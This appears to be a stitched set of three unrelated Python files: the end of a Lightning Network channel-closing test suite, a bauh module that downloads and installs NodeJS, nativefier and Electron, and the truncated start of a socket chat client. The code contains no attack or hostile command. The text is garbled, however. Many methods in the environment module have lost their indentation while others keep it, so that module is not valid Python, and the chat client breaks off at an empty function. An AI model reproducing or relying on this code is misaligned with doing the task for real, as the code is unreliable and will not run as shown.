                   'xWIRE_SHUTDOWN']
    l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
                                               'dev-no-reconnect': None,
                                               'disconnect': disconnects},
                                              {'may_reconnect': True,
                                               'dev-no-reconnect': None}])

    # Start payment, will disconnect
    l1.pay(l2, 200000)
    wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['connected'] is False)

    # Tell it to close (will block)
    fut = executor.submit(l1.rpc.close, l2.info['id'])

    # Original problem was with multiple disconnects, but to simplify we make
    # l2 send shutdown too.
    fut2 = executor.submit(l2.rpc.close, l1.info['id'])

    # Reconnect, shutdown will continue disconnect again
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)

    # Now l2 should be in CLOSINGD_SIGEXCHANGE, l1 still waiting on
    # WIRE_REVOKE_AND_ACK.
    wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE')
    assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CHANNELD_SHUTTING_DOWN'

    # They don't realize they're not talking, so disconnect and reconnect.
    l1.rpc.disconnect(l2.info['id'], force=True)

    # Now it hangs, since l1 is expecting rexmit of revoke-and-ack.
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)

    # Both closes should complete once the rexmit goes through.
    fut.result(TIMEOUT)
    fut2.result(TIMEOUT)
@pytest.mark.openchannel('v1')
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel(node_factory, executor):
    """Ideally you'd keep talking to us about closed channels: simple"""
    # l2 stops receiving after sending WIRE_CLOSING_SIGNED, so the two ends
    # disagree about whether the close completed.
    disconnects = ['xWIRE_CLOSING_SIGNED']

    l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
                                               'dev-no-reconnect': None,
                                               'disconnect': disconnects},
                                              {'may_reconnect': True,
                                               'dev-no-reconnect': None}])

    l1.pay(l2, 200000)

    fut = executor.submit(l1.rpc.close, l2.info['id'])

    # l2 considers the closing done, l1 does not
    wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
    assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'

    # l1 reconnects, it should succeed.
    # Make sure we get a fresh connection so the rexmit happens.
    if only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected']:
        l1.rpc.disconnect(l2.info['id'], force=True)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    fut.result(TIMEOUT)
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel_onchain(node_factory, bitcoind, executor):
    """Ideally you'd keep talking to us about closed channels: even if close is mined"""
    disconnects = ['xWIRE_CLOSING_SIGNED']

    l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
                                               'dev-no-reconnect': None,
                                               'disconnect': disconnects},
                                              {'may_reconnect': True,
                                               'dev-no-reconnect': None}])

    l1.pay(l2, 200000)

    fut = executor.submit(l1.rpc.close, l2.info['id'])

    # l2 considers the closing done, l1 does not
    wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
    assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'

    # l1 does not see any new blocks.
    def no_new_blocks(req):
        # Mock bitcoind response: pretend the chain has not advanced.
        return {"result": {"blockhash": None, "block": None}}

    l1.daemon.rpcproxy.mock_rpc('getrawblockbyheight', no_new_blocks)

    # Close transaction mined
    bitcoind.generate_block(1, wait_for_mempool=1)

    wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'ONCHAIN')

    # l1 reconnects, it should succeed.
    # l1 will disconnect once it sees block
    wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['connected'] is False)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    fut.result(TIMEOUT)
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
@pytest.mark.developer("too slow without fast polling for blocks")
def test_segwit_anyshutdown(node_factory, bitcoind, executor):
    """Try a range of future segwit versions for shutdown"""
    l1, l2 = node_factory.line_graph(2, fundchannel=False)

    l1.fundwallet(10**7)

    # Based on BIP-320, but all changed to regtest.
    addrs = ("BCRT1QW508D6QEJXTDG4Y5R3ZARVARY0C5XW7KYGT080",
             "bcrt1qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3qzf4jry",
             "bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56",
             "BCRT1SW50QT2UWHA",
             "bcrt1zw508d6qejxtdg4y5r3zarvaryv2wuatf",
             "bcrt1qqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvseswlauz7",
             "bcrt1pqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvsesyga46z",
             "bcrt1p0xlxvlhemja6c4dqv22uapctqupfhlxm9h8z3k2e72q4k9hcz7vqc8gma6")

    # Open a fresh channel for every address and close it to that address.
    for addr in addrs:
        l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
        l1.rpc.fundchannel(l2.info['id'], 10**6)
        # If we don't actually make a payment, two of the above cases fail
        # because the resulting tx is too small! Balance channel so close
        # has two outputs.
        bitcoind.generate_block(1, wait_for_mempool=1)
        wait_for(lambda: any([c['state'] == 'CHANNELD_NORMAL' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
        l1.pay(l2, 10**9 // 2)
        l1.rpc.close(l2.info['id'], destination=addr)
        bitcoind.generate_block(1, wait_for_mempool=1)
        wait_for(lambda: all([c['state'] == 'ONCHAIN' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
@pytest.mark.developer("needs to manipulate features")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
def test_anysegwit_close_needs_feature(node_factory, bitcoind):
    """Rather than have peer reject our shutdown, we should refuse to shutdown toa v1+ address if they don't support it"""
    # L2 says "no option_shutdown_anysegwit"
    l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True},
                                              {'may_reconnect': True,
                                               'dev-force-features': -27}])

    # Closing to a v1 (taproot-style) address must be refused locally.
    with pytest.raises(RpcError, match=r'Peer does not allow v1\+ shutdown addresses'):
        l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')

    # From TFM: "Tell your friends to upgrade!"
    l2.stop()
    del l2.daemon.opts['dev-force-features']
    l2.start()

    # Now it will work!
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
    wait_for(lambda: only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
    bitcoind.generate_block(1, wait_for_mempool=1)
def test_close_feerate_range(node_factory, bitcoind, chainparams):
    """Test the quick-close fee range negotiation"""
    l1, l2 = node_factory.line_graph(2)

    # Collected close-progress notification messages.
    notifications = []

    def save_notifications(message, progress, request, **kwargs):
        notifications.append(message)

    # Lowball the range here.
    with l1.rpc.notify(save_notifications):
        l1.rpc.close(l2.info['id'], feerange=['253perkw', 'normal'])

    if not chainparams['elements']:
        l1_range = [138, 4110]
        l2_range = [1027, 1000000]
    else:
        # That fee output is a little chunky.
        l1_range = [220, 6547]
        l2_range = [1636, 1000000]

    l1.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l1_range[0], l1_range[1]))
    l2.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l2_range[0], l2_range[1]))

    # Quick close happens in the intersection of both ranges.
    overlap = [max(l1_range[0], l2_range[0]), min(l1_range[1], l2_range[1])]
    l1.daemon.wait_for_log('performing quickclose in range {}sat-{}sat'.format(overlap[0], overlap[1]))

    log = l1.daemon.is_in_log('Their actual closing tx fee is .*sat')
    rate = re.match('.*Their actual closing tx fee is ([0-9]*sat).*', log).group(1)

    assert notifications == ['Sending closing fee offer {}, with range {}sat-{}sat'.format(rate,
                                                                                           l1_range[0],
                                                                                           l1_range[1]),
                             'Received closing fee offer {}, with range {}sat-{}sat'.format(rate,
                                                                                            l2_range[0],
                                                                                            l2_range[1])]
def test_close_twice(node_factory, executor):
    """A second close RPC with a workable feerange rescues a stuck close."""
    # First feerate is too low, second fixes it.
    l1, l2 = node_factory.line_graph(2, opts=[{'allow_warning': True,
                                               'may_reconnect': True},
                                              {'allow_warning': True,
                                               'may_reconnect': True,
                                               'feerates': (15000, 15000, 15000, 15000)}])

    # This makes it disconnect, since feerate is too low.
    fut = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '500perkw'])
    l1.daemon.wait_for_log('WARNING.*Unable to agree on a feerate')

    # Second attempt with a range wide enough to overlap l2's.
    fut2 = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '15000perkw'])

    # Now reconnect, it should work.
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    # Both pending close RPCs resolve to the same mutual close.
    assert fut.result(TIMEOUT)['type'] == 'mutual'
    assert fut2.result(TIMEOUT)['type'] == 'mutual'
def test_close_weight_estimate(node_factory, bitcoind):
    """closingd uses the expected closing tx weight to constrain fees; make sure that lightningd agrees
    once it has the actual agreed tx"""
    l1, l2 = node_factory.line_graph(2)
    l1.rpc.close(l2.info['id'])

    # Closingd gives this estimate before it begins
    log = l1.daemon.wait_for_log('Expected closing weight = ')
    expected_weight = int(re.match('.*Expected closing weight = ([0-9]*),.*', log).group(1))

    # This is the actual weight: in theory this could use their
    # actual sig, and thus vary, but we don't do that.
    log = l1.daemon.wait_for_log('Their actual closing tx fee is')
    actual_weight = int(re.match('.*: weight is ([0-9]*).*', log).group(1))

    assert actual_weight == expected_weight

    # Pull the final signed tx out of the broadcast log line.
    log = l1.daemon.wait_for_log('sendrawtransaction: ')
    tx = re.match('.*sendrawtransaction: ([0-9a-f]*).*', log).group(1)

    # This could actually be a bit shorter: 1 in 256 chance we get
    # lucky with a sig and it's shorter. We have 2 sigs, so that's
    # 1 in 128. Unlikely to do better than 2 bytes off though!
    signed_weight = int(bitcoind.rpc.decoderawtransaction(tx)['weight'])
    assert signed_weight <= actual_weight
    assert signed_weight >= actual_weight - 2
|
environment.py | import glob
import logging
import os
import shutil
import tarfile
import traceback
from datetime import datetime, timedelta
from pathlib import Path
from threading import Thread
from typing import Dict, List, Optional
import requests
import yaml
from bauh.api.abstract.download import FileDownloader
from bauh.api.abstract.handler import ProcessWatcher, TaskManager
from bauh.api.abstract.view import MessageType
from bauh.api.http import HttpClient
from bauh.commons import system
from bauh.commons.html import bold
from bauh.commons.system import SimpleProcess, ProcessHandler
from bauh.gems.web import ENV_PATH, NODE_DIR_PATH, NODE_BIN_PATH, NODE_MODULES_PATH, NATIVEFIER_BIN_PATH, \
ELECTRON_PATH, ELECTRON_DOWNLOAD_URL, ELECTRON_SHA256_URL, URL_ENVIRONMENT_SETTINGS, NPM_BIN_PATH, NODE_PATHS, \
nativefier, ELECTRON_WIDEVINE_URL, ELECTRON_WIDEVINE_SHA256_URL, \
ENVIRONMENT_SETTINGS_CACHED_FILE, ENVIRONMENT_SETTINGS_TS_FILE, get_icon_path, NATIVEFIER_BASE_URL
from bauh.gems.web.model import WebApplication
from bauh.view.util.translation import I18n
class EnvironmentComponent:
    """A downloadable component of the web environment (NodeJS, nativefier, Electron, ...)."""

    def __init__(self, id: str, name: str, size: str, version: str, url: str, update: bool = False, properties: Optional[dict] = None):
        self.id = id                  # stable identifier, e.g. 'nodejs', 'nativefier', 'electron', 'electron_sha256'
        self.name = name              # display / file name shown to the user
        self.size = size              # download size (HTTP content-length)
        self.version = version        # version that would be installed
        self.url = url                # download URL
        self.update = update          # True when the component must be (re)installed
        self.properties = properties  # extra data, e.g. {'widevine': bool} for Electron components
class EnvironmentUpdater:
    """Checks, downloads and installs the NodeJS / nativefier / Electron environment."""

    def __init__(self, logger: logging.Logger, http_client: HttpClient, file_downloader: FileDownloader, i18n: I18n, taskman: Optional[TaskManager] = None):
        self.logger = logger
        self.file_downloader = file_downloader
        self.i18n = i18n
        self.http_client = http_client
        # Task id used to report settings-download progress on the TaskManager (when one is provided).
        self.task_read_settings_id = 'web_read_settings'
        self.taskman = taskman
def _download_and_install(self, version: str, version_url: str, watcher: ProcessWatcher) -> bool:
self.logger.info("Downloading NodeJS {}: {}".format(version, version_url))
tarf_path = '{}/{}'.format(ENV_PATH, version_url.split('/')[-1])
downloaded = self.file_downloader.download(version_url, watcher=watcher, output_path=tarf_path, cwd=ENV_PATH)
if not downloaded:
self.logger.error("Could not download '{}'. Aborting...".format(version_url))
return False
else:
try:
tf = tarfile.open(tarf_path)
tf.extractall(path=ENV_PATH)
extracted_file = '{}/{}'.format(ENV_PATH, tf.getnames()[0])
if os.path.exists(NODE_DIR_PATH):
self.logger.info("Removing old NodeJS version installation dir -> {}".format(NODE_DIR_PATH))
try:
shutil.rmtree(NODE_DIR_PATH)
except:
self.logger.error("Could not delete old NodeJS version dir -> {}".format(NODE_DIR_PATH))
traceback.print_exc()
return False
try:
os.rename(extracted_file, NODE_DIR_PATH)
except:
self.logger.error("Could not rename the NodeJS version file {} as {}".format(extracted_file, NODE_DIR_PATH))
traceback.print_exc()
return False
if os.path.exists(NODE_MODULES_PATH):
self.logger.info('Deleting {}'.format(NODE_MODULES_PATH))
try:
shutil.rmtree(NODE_MODULES_PATH)
except:
self.logger.error("Could not delete the directory {}".format(NODE_MODULES_PATH))
return False
return True
except:
self.logger.error('Could not extract {}'.format(tarf_path))
traceback.print_exc()
return False
finally:
if os.path.exists(tarf_path):
try:
os.remove(tarf_path)
except:
self.logger.error('Could not delete file {}'.format(tarf_path))
def check_node_installed(self, version: str) -> bool:
if not os.path.exists(NODE_DIR_PATH):
return False
else:
installed_version = system.run_cmd('{} --version'.format(NODE_BIN_PATH), print_error=False)
if installed_version:
installed_version = installed_version.strip()
if installed_version.startswith('v'):
installed_version = installed_version[1:]
self.logger.info('Node versions: installed ({}), cloud ({})'.format(installed_version, version))
if version != installed_version:
self.logger.info("The NodeJs installed version is different from the Cloud.")
return False
else:
self.logger.info("Node is already up to date")
return True
else:
self.logger.warning("Could not determine the current NodeJS installed version")
return False
    def update_node(self, version: str, version_url: str, watcher: ProcessWatcher = None) -> bool:
        """Ensure NodeJS *version* is installed, downloading it when needed.

        Returns True when an up-to-date installation is present on return.
        """
        Path(ENV_PATH).mkdir(parents=True, exist_ok=True)

        if not os.path.exists(NODE_DIR_PATH):
            # Nothing installed yet: plain install.
            return self._download_and_install(version=version, version_url=version_url, watcher=watcher)
        else:
            installed_version = system.run_cmd('{} --version'.format(NODE_BIN_PATH), print_error=False)

            if installed_version:
                installed_version = installed_version.strip()

                # 'node --version' prints e.g. 'v14.17.0': drop the leading 'v'.
                if installed_version.startswith('v'):
                    installed_version = installed_version[1:]

                self.logger.info('Node versions: installed ({}), cloud ({})'.format(installed_version, version))

                if version != installed_version:
                    self.logger.info("The NodeJs installed version is different from the Cloud.")
                    return self._download_and_install(version=version, version_url=version_url, watcher=watcher)
                else:
                    self.logger.info("Node is already up to date")
                    return True
            else:
                # Installation present but unreadable: wipe it and reinstall.
                self.logger.warning("Could not determine the current NodeJS installed version")
                self.logger.info("Removing {}".format(NODE_DIR_PATH))

                try:
                    shutil.rmtree(NODE_DIR_PATH)
                    return self._download_and_install(version=version, version_url=version_url, watcher=watcher)
                except:
                    self.logger.error('Could not delete the dir {}'.format(NODE_DIR_PATH))
                    return False
def _install_node_lib(self, name: str, version: str, handler: ProcessHandler):
lib_repr = '{}{}'.format(name, '@{}'.format(version) if version else '')
self.logger.info("Installing {}".format(lib_repr))
if handler and handler.watcher:
handler.watcher.change_substatus(self.i18n['web.environment.install'].format(bold(lib_repr)))
proc = SimpleProcess([NPM_BIN_PATH, 'install', lib_repr], cwd=ENV_PATH, extra_paths=NODE_PATHS)
installed = handler.handle_simple(proc)[0]
if installed:
self.logger.info("{} successfully installed".format(lib_repr))
return installed
def _install_nativefier(self, version: str, url: str, handler: ProcessHandler) -> bool:
self.logger.info("Checking if nativefier@{} exists".format(version))
if not url or not self.http_client.exists(url):
self.logger.warning("The file {} seems not to exist".format(url))
handler.watcher.show_message(title=self.i18n['message.file.not_exist'],
body=self.i18n['message.file.not_exist.body'].format(bold(url)),
type_=MessageType.ERROR)
return False
success = self._install_node_lib('nativefier', version, handler)
if success:
return self._is_nativefier_installed()
    def _is_nativefier_installed(self) -> bool:
        # The local npm install is considered present when its launcher binary exists.
        return os.path.exists(NATIVEFIER_BIN_PATH)
    def download_electron(self, version: str, url: str, widevine: bool, watcher: ProcessWatcher) -> bool:
        """Download the Electron archive for *version* into the local Electron cache.

        *widevine* is only informational here (the url already encodes it).
        Returns True when the download succeeded.
        """
        Path(ELECTRON_PATH).mkdir(parents=True, exist_ok=True)
        self.logger.info("Downloading Electron {}".format(version))
        electron_path = self._get_electron_file_path(url=url, relative=False)

        if not self.http_client.exists(url):
            self.logger.warning("The file {} seems not to exist".format(url))
            watcher.show_message(title=self.i18n['message.file.not_exist'],
                                 body=self.i18n['message.file.not_exist.body'].format(bold(url)),
                                 type_=MessageType.ERROR)
            return False

        return self.file_downloader.download(file_url=url, watcher=watcher, output_path=electron_path, cwd=ELECTRON_PATH)
def download_electron_sha256(self, version: str, url: str, widevine: bool, watcher: ProcessWatcher) -> bool:
self.logger.info("Downloading Electron {} sha526".format(version))
sha256_path = self._get_electron_file_path(url=url, relative=False)
if not self.http_client.exists(url):
self.logger.warning("The file {} seems not to exist".format(url))
watcher.show_message(title=self.i18n['message.file.not_exist'],
body=self.i18n['message.file.not_exist.body'].format(bold(url)),
type_=MessageType.ERROR)
return False
return self.file_downloader.download(file_url=url, watcher=watcher, output_path=sha256_path, cwd=ELECTRON_PATH)
def _get_electron_url(self, version: str, is_x86_x64_arch: bool, widevine: bool) -> str:
arch = 'x64' if is_x86_x64_arch else 'ia32'
if widevine:
return ELECTRON_WIDEVINE_URL.format(version=version, arch=arch)
else:
return ELECTRON_DOWNLOAD_URL.format(version=version, arch=arch)
def _get_electron_sha256_url(self, version: str, widevine: bool) -> str:
if widevine:
return ELECTRON_WIDEVINE_SHA256_URL.format(version=version)
else:
return ELECTRON_SHA256_URL.format(version=version)
def _get_electron_file_path(self, url: str, relative: bool) -> str:
file_path = url.replace(':', '').replace('/', '') + '/' + url.split('/')[-1]
return '{}/{}'.format(ELECTRON_PATH, file_path) if not relative else file_path
    def check_electron_installed(self, version: str, is_x86_x64_arch: bool, widevine: bool) -> Dict[str, bool]:
        """Check whether the Electron archive and its sha256 file are already cached.

        Returns {'electron': bool, 'sha256': bool} where True means the file
        is present (no download needed).
        """
        self.logger.info("Checking if Electron {} (widevine={}) is installed".format(version, widevine))
        res = {'electron': False, 'sha256': False}

        if not os.path.exists(ELECTRON_PATH):
            self.logger.info("The Electron folder {} was not found".format(ELECTRON_PATH))
        else:
            # All cached files, relative to the Electron cache dir.
            files = {f.split(ELECTRON_PATH + '/')[1] for f in glob.glob(ELECTRON_PATH + '/**', recursive=True) if os.path.isfile(f)}

            if files:
                electron_url = self._get_electron_url(version, is_x86_x64_arch, widevine)
                file_path = self._get_electron_file_path(url=electron_url, relative=True)

                res['electron'] = file_path in files

                if not res['electron']:
                    # NOTE(review): when the archive is missing, sha256 is marked True,
                    # apparently to skip the existence check (the caller re-downloads
                    # the sha based on the missing archive anyway) — confirm intended.
                    res['sha256'] = True
                else:
                    sha_url = self._get_electron_sha256_url(version=version, widevine=widevine)
                    sha_path = self._get_electron_file_path(url=sha_url, relative=True)
                    res['sha256'] = sha_path in files
            else:
                self.logger.info('No Electron file found in {}'.format(ELECTRON_PATH))

        for att in ('electron', 'sha256'):
            if res[att]:
                self.logger.info('{} ({}) already downloaded'.format(att, version))

        return res
def _finish_task_download_settings(self):
if self.taskman:
self.taskman.update_progress(self.task_read_settings_id, 100, None)
self.taskman.finish_task(self.task_read_settings_id)
def should_download_settings(self, web_config: dict) -> bool:
try:
settings_exp = int(web_config['environment']['cache_exp'])
except ValueError:
self.logger.error("Could not parse settings property 'environment.cache_exp': {}".format(web_config['environment']['cache_exp']))
return True
if settings_exp <= 0:
self.logger.info("No expiration time configured for the environment settings cache file.")
return True
self.logger.info("Checking cached environment settings file")
if not os.path.exists(ENVIRONMENT_SETTINGS_CACHED_FILE):
self.logger.warning("Environment settings file not cached.")
return True
if not os.path.exists(ENVIRONMENT_SETTINGS_TS_FILE):
self.logger.warning("Environment settings file has no timestamp associated with it.")
return True
with open(ENVIRONMENT_SETTINGS_TS_FILE) as f:
env_ts_str = f.read()
try:
env_timestamp = datetime.fromtimestamp(float(env_ts_str))
except:
self.logger.error("Could not parse environment settings file timestamp: {}".format(env_ts_str))
return True
expired = env_timestamp + timedelta(hours=settings_exp) <= datetime.utcnow()
if expired:
self.logger.info("Environment settings file has expired. It should be re-downloaded")
return True
else:
self.logger.info("Cached environment settings file is up to date")
return False
    def read_cached_settings(self, web_config: dict) -> Optional[dict]:
        """Return the cached environment settings when still valid, otherwise None.

        Also returns None (implicitly) when the cached YAML cannot be parsed.
        """
        if not self.should_download_settings(web_config):
            with open(ENVIRONMENT_SETTINGS_CACHED_FILE) as f:
                cached_settings_str = f.read()

            try:
                return yaml.safe_load(cached_settings_str)
            except yaml.YAMLError:
                self.logger.error('Could not parse the cache environment settings file: {}'.format(cached_settings_str))
    def read_settings(self, web_config: dict, cache: bool = True) -> Optional[dict]:
        """Return the environment settings, preferring the local cache when valid.

        Falls back to downloading from URL_ENVIRONMENT_SETTINGS, then caches
        the YAML and a timestamp to disk. Returns None when the download or
        the parsing fails. TaskManager progress is reported when available.
        """
        if self.taskman:
            self.taskman.register_task(self.task_read_settings_id, self.i18n['web.task.download_settings'], get_icon_path())
            self.taskman.update_progress(self.task_read_settings_id, 1, None)

        cached_settings = self.read_cached_settings(web_config) if cache else None

        if cached_settings:
            return cached_settings

        try:
            if self.taskman:
                self.taskman.update_progress(self.task_read_settings_id, 10, None)

            self.logger.info("Downloading environment settings")
            res = self.http_client.get(URL_ENVIRONMENT_SETTINGS)

            if not res:
                self.logger.warning('Could not retrieve the environments settings from the cloud')
                self._finish_task_download_settings()
                return

            try:
                settings = yaml.safe_load(res.content)
            except yaml.YAMLError:
                self.logger.error('Could not parse environment settings: {}'.format(res.text))
                self._finish_task_download_settings()
                return

            self.logger.info("Caching environment settings to disk")
            cache_dir = os.path.dirname(ENVIRONMENT_SETTINGS_CACHED_FILE)

            try:
                Path(cache_dir).mkdir(parents=True, exist_ok=True)
            except OSError:
                # NOTE(review): a cache-dir failure discards the already-downloaded
                # settings (returns None) — confirm that is intended rather than
                # returning 'settings' uncached.
                self.logger.error("Could not create Web cache directory: {}".format(cache_dir))
                self.logger.info('Finished')
                self._finish_task_download_settings()
                return

            cache_timestamp = datetime.utcnow().timestamp()

            with open(ENVIRONMENT_SETTINGS_CACHED_FILE, 'w+') as f:
                f.write(yaml.safe_dump(settings))

            with open(ENVIRONMENT_SETTINGS_TS_FILE, 'w+') as f:
                f.write(str(cache_timestamp))

            self._finish_task_download_settings()
            self.logger.info("Finished")
            return settings
        except requests.exceptions.ConnectionError:
            self._finish_task_download_settings()
            return
    def _check_and_fill_electron(self, pkg: WebApplication, env: dict, local_config: dict, x86_x64: bool, widevine: bool, output: List[EnvironmentComponent]):
        """Append the Electron archive and sha256 components (with update flags) to *output*.

        Version precedence: local config override > per-app preset > cloud
        settings (overrides only apply to the non-widevine build).
        """
        electron_version = env['electron-wvvmp' if widevine else 'electron']['version']

        if not widevine and pkg.version and pkg.version != electron_version:  # this feature does not support custom widevine electron at the moment
            self.logger.info('A preset Electron version is defined for {}: {}'.format(pkg.url, pkg.version))
            electron_version = pkg.version

        if not widevine and local_config['environment']['electron']['version']:
            self.logger.warning("A custom Electron version will be used {} to install {}".format(electron_version, pkg.url))
            electron_version = local_config['environment']['electron']['version']

        electron_status = self.check_electron_installed(version=electron_version, is_x86_x64_arch=x86_x64, widevine=widevine)

        electron_url = self._get_electron_url(version=electron_version, is_x86_x64_arch=x86_x64, widevine=widevine)
        output.append(EnvironmentComponent(name=electron_url.split('/')[-1],
                                           version=electron_version,
                                           url=electron_url,
                                           size=self.http_client.get_content_length(electron_url),
                                           id='electron',
                                           update=not electron_status['electron'],
                                           properties={'widevine': widevine}))

        sha_url = self._get_electron_sha256_url(version=electron_version, widevine=widevine)
        output.append(EnvironmentComponent(name=sha_url.split('/')[-1],
                                           version=electron_version,
                                           url=sha_url,
                                           size=self.http_client.get_content_length(sha_url),
                                           id='electron_sha256',
                                           update=not electron_status['electron'] or not electron_status['sha256'],
                                           properties={'widevine': widevine}))
    def _check_and_fill_node(self, env: dict, output: List[EnvironmentComponent]):
        """Append the NodeJS and nativefier components (with update flags) to *output*.

        Updating Node forces a nativefier reinstall (node_modules is wiped on
        Node install); otherwise nativefier is checked independently.
        """
        node = EnvironmentComponent(name=env['nodejs']['url'].split('/')[-1],
                                    url=env['nodejs']['url'],
                                    size=self.http_client.get_content_length(env['nodejs']['url']),
                                    version=env['nodejs']['version'],
                                    id='nodejs')
        output.append(node)

        native = self._map_nativefier_file(env['nativefier'])
        output.append(native)

        if not self.check_node_installed(env['nodejs']['version']):
            node.update, native.update = True, True
        else:
            if not self._check_nativefier_installed(env['nativefier']):
                native.update = True
    def _check_nativefier_installed(self, nativefier_settings: dict) -> bool:
        """Return True when the locally installed nativefier matches the cloud version."""
        if not os.path.exists(NODE_MODULES_PATH):
            self.logger.info('Node modules path {} not found'.format(NODE_MODULES_PATH))
            return False
        else:
            if not self._is_nativefier_installed():
                return False

            installed_version = nativefier.get_version()

            if installed_version:
                installed_version = installed_version.strip()

            self.logger.info("Nativefier versions: installed ({}), cloud ({})".format(installed_version, nativefier_settings['version']))

            if nativefier_settings['version'] != installed_version:
                self.logger.info("Installed nativefier version is different from cloud's. Changing version.")
                return False

            self.logger.info("Nativefier is already installed and up to date")
            return True
    def _map_nativefier_file(self, nativefier_settings: dict) -> EnvironmentComponent:
        """Build the nativefier EnvironmentComponent from the cloud settings.

        Falls back to the hardcoded NATIVEFIER_BASE_URL when the settings do
        not declare a download URL template.
        """
        base_url = nativefier_settings.get('url')

        if not base_url:
            self.logger.warning("'url' not found in nativefier environment settings. Using hardcoded URL '{}'".format(NATIVEFIER_BASE_URL))
            base_url = NATIVEFIER_BASE_URL

        url = base_url.format(version=nativefier_settings['version'])

        return EnvironmentComponent(name='nativefier@{}'.format(nativefier_settings['version']),
                                    url=url,
                                    size=self.http_client.get_content_length(url),
                                    version=nativefier_settings['version'],
                                    id='nativefier')
    def check_environment(self, env: dict, local_config: dict, app: WebApplication,
                          is_x86_x64_arch: bool, widevine: bool) -> List[EnvironmentComponent]:
        """Determine which environment components need installing/updating for *app*.

        Node/nativefier and Electron checks run on parallel threads, each
        appending its components to the shared list. When the local config
        selects the system's nativefier, only Electron is checked.

        :param env: cloud environment settings
        :param local_config: local web gem configuration
        :param app: application to be installed
        :param is_x86_x64_arch: whether the host is x86_64
        :param widevine: whether the widevine Electron build is required
        :return: the components (with their 'update' flags set)
        """
        components, check_threads = [], []

        system_env = local_config['environment'].get('system', False)

        if system_env:
            self.logger.warning("Using system's nativefier to install {}".format(app.url))
        else:
            node_check = Thread(target=self._check_and_fill_node, args=(env, components))
            node_check.start()
            check_threads.append(node_check)

        elec_check = Thread(target=self._check_and_fill_electron, args=(app, env, local_config, is_x86_x64_arch, widevine, components))
        elec_check.start()
        check_threads.append(elec_check)

        for t in check_threads:
            t.join()

        return components
def update(self, components: List[EnvironmentComponent], handler: ProcessHandler) -> bool:
self.logger.info('Updating environment')
Path(ENV_PATH).mkdir(parents=True, exist_ok=True)
comp_map = {c.id: c for c in components}
node_data = comp_map.get('nodejs')
nativefier_data = comp_map.get('nativefier')
if node_data:
if not self._download_and_install(version=node_data.version, version_url=node_data.url, watcher=handler.watcher):
return False
if not self._install_nativefier(version=nativefier_data.version, url=nativefier_data.url, handler=handler):
return False
else:
if nativefier_data and not self._install_nativefier(version=nativefier_data.version, url=nativefier_data.url, handler=handler):
return False
electron_data = comp_map.get('electron')
if electron_data:
if not self.download_electron(version=electron_data.version, url=electron_data.url, watcher=handler.watcher, widevine=electron_data.properties['widevine']):
return False
sha256_data = comp_map.get('electron_sha256')
if sha256_data:
if not self.download_electron_sha256(version=sha256_data.version, url=sha256_data.url, watcher=handler.watcher, widevine=sha256_data.properties['widevine']):
return False
self.logger.info('Environment successfully updated')
return True
|
chat.py | import socket
import select
import errno
import sys
import os
import threading
import time
# below is the client of chat.
# Protocol constants: every payload is preceded by a fixed-width ASCII header
# holding the payload length, left-justified in HEADER_LENGTH characters.
HEADER_LENGTH = 10
IP = "127.0.0.1"
PORT = 1234
# Lines re-printed after clearing the screen (simple console "UI" state).
console_line_content = []
my_username = input("Username: ")
console_line_content.append("Name: " + my_username + ", Here is my chat console.")
os.system('clear')
for line in console_line_content:
    print(line)
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((IP, PORT))
# Non-blocking: recv() in the reader thread raises EAGAIN/EWOULDBLOCK when idle.
client_socket.setblocking(False)
# Handshake: announce our username using the same length-header framing.
username = my_username.encode("utf-8")
username_header = f"{len(username):<{HEADER_LENGTH}}".encode("utf-8")
client_socket.send(username_header + username)
def receive_thing():
